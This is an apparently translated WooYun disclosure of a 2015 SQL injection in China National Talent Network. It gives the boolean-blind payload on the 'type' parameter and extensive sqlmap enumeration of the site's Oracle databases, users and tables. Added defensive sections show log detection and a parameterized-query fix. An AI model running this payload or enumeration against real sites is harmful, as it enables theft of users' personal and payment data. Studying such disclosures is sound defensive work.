
Vulnerability summary (followed by 24 users)

Vulnerability ID: wooyun-2015-0142861

Title: SQL injection in China National Talent Network (中国国家人才网) leaks several hundred thousand user records

Affected vendor: 中国国家人才网 (China National Talent Network)

Author: 路人甲

Submitted: 2015-09-24 11:35

Fixed: 2015-11-13 09:08

Published: 2015-11-13 09:08

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 14

Status: handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-09-24: Details sent to the vendor; awaiting vendor handling
2015-09-29: CNCERT (National Internet Emergency Center) has not yet been able to reach the responsible unit; details disclosed only to the reporting agency
2015-10-09: Details disclosed to core white hats and domain experts
2015-10-19: Details disclosed to regular white hats
2015-10-29: Details disclosed to intern white hats
2015-11-13: Details disclosed to the public

Brief description:

A SQL injection at one location on China National Talent Network leaks several hundred thousand user records...

Detailed description:

Injection URL: http://**.**.**.**/party/listAction!listTB_XXFB_Djkw.action?type=djkw_type
Running sqlmap directly against it dumped a large amount of data, the National Talent Network's data...
Several hundred thousand records...
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| TB_CWGL_PAY         | 369101  |
| TB_DAGL_DOCINFO     | 120601  |
| TEMP                | 113446  |
| TB_GGGL_BH          | 36238   |
| TB_DYGL_INFO        | 11561   |
| TB_DYGL_INFO_EAST   | 8103    |
| BIL_ACCOUNT         | 1143    |
| SY_S_ROLEFUNCTIONS  | 742     |
| SY_D_FUNCTION       | 534     |
+---------------------+---------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: type
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=djkw_type' AND 2134=2134 AND 'sfvD'='sfvD
---
[21:50:44] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
available databases [22]:
[*] BJEPN_PARTY_QGRC
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EPN_QGRC
[*] EXFSYS
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
web application technology: JSP
back-end DBMS: Oracle
[20:17:35] [INFO] fetching database users privileges
[20:17:35] [INFO] fetching database users
[20:17:35] [INFO] fetching number of database users
[20:17:35] [INFO] resumed: 29
[20:17:35] [INFO] resuming partial value: BJEPN_
[20:17:35] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:17:35] [INFO] retrieved: PARTY_QGRC
[20:18:24] [INFO] retrieved: BI
[20:18:36] [INFO] retrieved: PM
[20:18:49] [INFO] retrieved: SH
[20:19:02] [INFO] retrieved: IX
[20:19:15] [INFO] retrieved: OE
[20:19:29] [INFO] retrieved: HR
[20:19:43] [INFO] retrieved: SCOTT
[20:20:11] [INFO] retrieved: MGMT_VIEW
[20:20:58] [INFO] retrieved: EPN_QGRC
[20:21:40] [INFO] retrieved: MDDATA
[20:22:11] [INFO] retrieved: SYSMAN
[20:22:42] [INFO] retrieved: MDSYS
[20:23:09] [INFO] retrieved: SI_INFORMTN_SCHEMA
[20:24:47] [INFO] retrieved: ORDPLUGINS
[20:25:39] [INFO] retrieved: ORDSYS
[20:26:12] [INFO] retrieved: OLAPSYS
[20:26:49] [INFO] retrieved: ANONYMOUS
[20:27:35] [INFO] retrieved: XDB
[20:27:58] [INFO] retrieved: CTXSYS
[20:28:31] [INFO] retrieved: EXFSYS
[20:29:03] [INFO] retrieved: WMSYS
[20:29:32] [INFO] retrieved: DBSNMP
[20:30:07] [INFO] retrieved: TSMSYS
[20:30:40] [INFO] retrieved: DMSYS
[20:31:08] [INFO] retrieved: DIP
[20:31:26] [INFO] retrieved: OUTLN
[20:31:53] [INFO] retrieved: SYSTEM
[20:32:25] [INFO] retrieved: SYS
current schema (equivalent to database on Oracle): 'BJEPN_PARTY_QGRC'
current user: 'BJEPN_PARTY_QGRC'
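The sqlmap output above shows what the probing looks like from the server side: one parameter (`type`) receives a closing quote followed by a boolean condition, and the blind extraction then needs one request per retrieved character, so the same client sends a long burst of near-identical requests. The following added example (not part of the original report, and not code from WooYun or the affected site) runs that signature over a few constructed access-log lines. The log format, client addresses and timestamps are assumptions; the request path and the probe value are the ones quoted in the report.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (Common Log Format is assumed; the IPs are
# documentation addresses, not anything from the report). Line 2 carries the
# probe sqlmap reported, line 3 the false branch of the same probe (2134=2135).
SAMPLE_LOG = """\
203.0.113.10 - - [24/Sep/2015:20:17:35 +0800] "GET /party/listAction!listTB_XXFB_Djkw.action?type=djkw_type HTTP/1.1" 200 5120
203.0.113.10 - - [24/Sep/2015:20:17:36 +0800] "GET /party/listAction!listTB_XXFB_Djkw.action?type=djkw_type%27%20AND%202134%3D2134%20AND%20%27sfvD%27%3D%27sfvD HTTP/1.1" 200 5120
203.0.113.10 - - [24/Sep/2015:20:17:37 +0800] "GET /party/listAction!listTB_XXFB_Djkw.action?type=djkw_type%27%20AND%202134%3D2135%20AND%20%27sfvD%27%3D%27sfvD HTTP/1.1" 200 312
198.51.100.7 - - [24/Sep/2015:20:17:40 +0800] "GET /party/listAction!listTB_XXFB_Djkw.action?type=djkw_type HTTP/1.1" 200 5120
"""

# One CLF request line: client, timestamp, method, request target, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)

# Signature of a boolean-based blind probe as seen in the report: a closing
# quote, a boolean operator, then a comparison between two simple operands.
BLIND_RE = re.compile(r"'\s*(?:AND|OR)\s+[\w']+\s*=\s*[\w']+", re.IGNORECASE)


def parse_line(line):
    """Parse one log line into a dict with the decoded query parameters, or None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    # parse_qsl percent-decodes, so %27 becomes the quote the signature looks for.
    rec["params"] = parse_qsl(url.query, keep_blank_values=True)
    return rec


def suspicious_params(params):
    """Return the (name, value) pairs whose decoded value matches the probe signature."""
    return [(name, value) for name, value in params if BLIND_RE.search(value)]


def scan(log_text, burst_threshold=2):
    """Flag probing requests and the clients that send them repeatedly.

    Returns (alerts, bursts): one alert per matching request, and a dict of
    client -> hit count for clients at or above burst_threshold. Blind
    extraction is request-intensive, so the per-client count is the stronger
    signal; a single hit may be a scanner doing one pass.
    """
    alerts = []
    hits_per_client = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = suspicious_params(rec["params"])
        if not hits:
            continue
        hits_per_client[rec["ip"]] += 1
        name, value = hits[0]
        alerts.append({"ip": rec["ip"], "ts": rec["ts"], "path": rec["path"],
                       "param": name, "value": value})
    bursts = {ip: n for ip, n in hits_per_client.items() if n >= burst_threshold}
    return alerts, bursts


if __name__ == "__main__":
    found, repeat_offenders = scan(SAMPLE_LOG)
    for a in found:
        print(f'{a["ts"]} {a["ip"]} {a["path"]} param={a["param"]} value={a["value"]!r}')
    print("clients with repeated probes:", repeat_offenders)
```

Two points the signature does not cover on its own: the probe can be split across several parameters or sent in a POST body, so in practice the same check should run over every decoded parameter of the request, and the `size` column (5120 vs 312 in the constructed lines) is the other tell of a boolean-based probe, since the true and false branches return visibly different responses.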


[Screenshots: 2.png, 3.png, 4.jpg]


Proof of vulnerability:

Database: BJEPN_PARTY_QGRC
[44 tables]
+---------------------+
| A1                  |
| A_TEMP              |
| BIL_ACCOUNT         |
| RECEIPTLIST         |
| SY_A_SETTING        |
| SY_D_COMROLE        |
| SY_D_FUNCTION       |
| SY_D_LOG            |
| SY_D_PARA           |
| SY_D_PARATYPE       |
| SY_D_PARATYPEV      |
| SY_D_PARAV          |
| SY_D_PORTAL         |
| SY_D_PORTALUSER     |
| SY_D_ROLE           |
| SY_D_USER           |
| SY_D_USERV          |
| SY_S_ROLEFUNCTIONS  |
| SY_S_USERROLES      |
| TB_CWGL_PAY         |
| TB_DAGL_DOCINFO     |
| TB_DYGL_ARTICLE     |
| TB_DYGL_EMAIL       |
| TB_DYGL_INFO        |
| TB_DYGL_INFO_EAST   |
| TB_DYGL_LOG         |
| TB_DYGL_MESSAGE     |
| TB_DYGL_RECORD      |
| TB_DYGL_SIGNUP      |
| TB_DYGL_ZBINFO      |
| TB_DYGL_ZBINFO_EAST |
| TB_GGGL_BEIJING     |
| TB_GGGL_BH          |
| TB_GGGL_HY          |
| TB_GGGL_ZY          |
| TB_UPLOAD           |
| TB_XTGL_DEPT        |
| TB_XTGL_POST        |
| TB_XXFB_ABOUTUS     |
| TB_XXFB_ACTIVE      |
| TB_XXFB_NEWS        |
| TB_XXFB_ZXZX        |
| TB_ZHGL_VIP         |
| TEMP                |
+---------------------+
Database: BJEPN_PARTY_QGRC
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| TB_CWGL_PAY         | 369101  |
| TB_DAGL_DOCINFO     | 120601  |
| TEMP                | 113446  |
| TB_GGGL_BH          | 36238   |
| TB_DYGL_INFO        | 11561   |
| TB_DYGL_INFO_EAST   | 8103    |
| BIL_ACCOUNT         | 1143    |
| SY_S_ROLEFUNCTIONS  | 742     |
| SY_D_FUNCTION       | 534     |
| TB_GGGL_BEIJING     | 399     |
| TB_DYGL_LOG         | 358     |
| SY_D_PARAV          | 300     |
| TB_GGGL_ZY          | 300     |
| TB_DYGL_ZBINFO      | 248     |
| TB_XXFB_NEWS        | 218     |
| TB_GGGL_HY          | 136     |
| A_TEMP              | 117     |
| TB_DYGL_ZBINFO_EAST | 98      |
| TB_UPLOAD           | 84      |
| TB_ZHGL_VIP         | 80      |
| SY_D_USERV          | 50      |
| SY_D_PARATYPEV      | 40      |
| TB_XXFB_ACTIVE      | 33      |
| SY_D_USER           | 32      |
| SY_D_PARA           | 31      |
| TB_XTGL_POST        | 31      |
| SY_S_USERROLES      | 27      |
| SY_D_ROLE           | 21      |
| SY_D_PARATYPE       | 20      |
| TB_XXFB_ZXZX        | 19      |
| TB_XTGL_DEPT        | 17      |
| SY_D_PORTAL         | 15      |
| SY_A_SETTING        | 13      |
| TB_DYGL_ARTICLE     | 8       |
| TB_DYGL_MESSAGE     | 5       |
| TB_DYGL_SIGNUP      | 5       |
| SY_D_PORTALUSER     | 4       |
| TB_XXFB_ABOUTUS     | 4       |
| SY_D_COMROLE        | 3       |
| SY_D_LOG            | 3       |
+---------------------+---------+


[Screenshots: 5.png, 6.png]


I won't go into any further detail...

Remediation:

You know what to do...
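The author leaves the fix unstated. The usual one for this class of bug is to stop splicing the `type` parameter into the SQL text and bind it instead, and, since `type` is a category selector rather than free text, to additionally check it against an allowlist. The added example below (not code from the report, WooYun, or the affected site) shows both alongside the vulnerable pattern. The affected application is JSP on Oracle; an in-memory SQLite database stands in here so the example runs offline, and the table layout, column names and rows are constructed, not the site's real schema. The probe value is the one sqlmap reported; `PROBE_FALSE` is its false branch.

```python
import sqlite3

# Constructed stand-in for a "list by type" lookup; the real schema is not on the page.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tb_xxfb_djkw (id INTEGER PRIMARY KEY, type TEXT, title TEXT)")
    conn.executemany("INSERT INTO tb_xxfb_djkw (type, title) VALUES (?, ?)", [
        ("djkw_type", "public notice 1"),
        ("djkw_type", "public notice 2"),
        ("other_type", "internal record"),
    ])
    return conn


# The probe from the report, and the false branch of the same probe.
PROBE_TRUE = "djkw_type' AND 2134=2134 AND 'sfvD'='sfvD"
PROBE_FALSE = PROBE_TRUE.replace("2134=2134", "2134=2135")


def list_vulnerable(conn, type_value):
    """The pattern the finding implies: the request parameter becomes SQL syntax.

    With PROBE_TRUE the injected condition holds and the normal rows come back;
    with PROBE_FALSE it fails and nothing comes back. That difference in the
    response is exactly what a boolean-based blind injection reads one bit at a time.
    """
    sql = "SELECT id, title FROM tb_xxfb_djkw WHERE type = '" + type_value + "'"
    return conn.execute(sql).fetchall()


def list_safe(conn, type_value):
    """Bind the value instead: the driver passes it separately from the SQL text,
    so a quote inside it is data, not syntax. Either probe now simply matches no row.
    (The Java/Oracle equivalent is PreparedStatement with setString.)"""
    return conn.execute(
        "SELECT id, title FROM tb_xxfb_djkw WHERE type = ?", (type_value,)
    ).fetchall()


# Constructed allowlist: `type` selects a category, so only known values make sense.
ALLOWED_TYPES = frozenset({"djkw_type", "other_type"})


def list_safe_allowlisted(conn, type_value):
    """Defence in depth: reject unknown categories before the query runs at all."""
    if type_value not in ALLOWED_TYPES:
        raise ValueError("unknown type value")
    return list_safe(conn, type_value)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal value:", len(list_vulnerable(db, "djkw_type")), "rows")
    print("vulnerable, true probe:  ", len(list_vulnerable(db, PROBE_TRUE)), "rows")
    print("vulnerable, false probe: ", len(list_vulnerable(db, PROBE_FALSE)), "rows")
    print("bound, true probe:       ", len(list_safe(db, PROBE_TRUE)), "rows")
    print("bound, false probe:      ", len(list_safe(db, PROBE_FALSE)), "rows")
```

The allowlist is not a substitute for binding: it closes this one parameter, but every other value that reaches a query (search strings, sort columns, pagination offsets) still has to go through bound parameters or a fixed mapping, and the application's database account should only hold the privileges the list action needs, not the schema-wide read access the dump above demonstrates.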

Copyright notice: please credit the source when republishing: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability rank: 10

Confirmed: 2015-09-29 09:07

Vendor reply:

CNVD has confirmed and reproduced the reported issue; it has been forwarded via CNCERT to the competent department of the Ministry of Human Resources and Social Security, which will coordinate handling with the website's operating unit.

Latest status:

None yet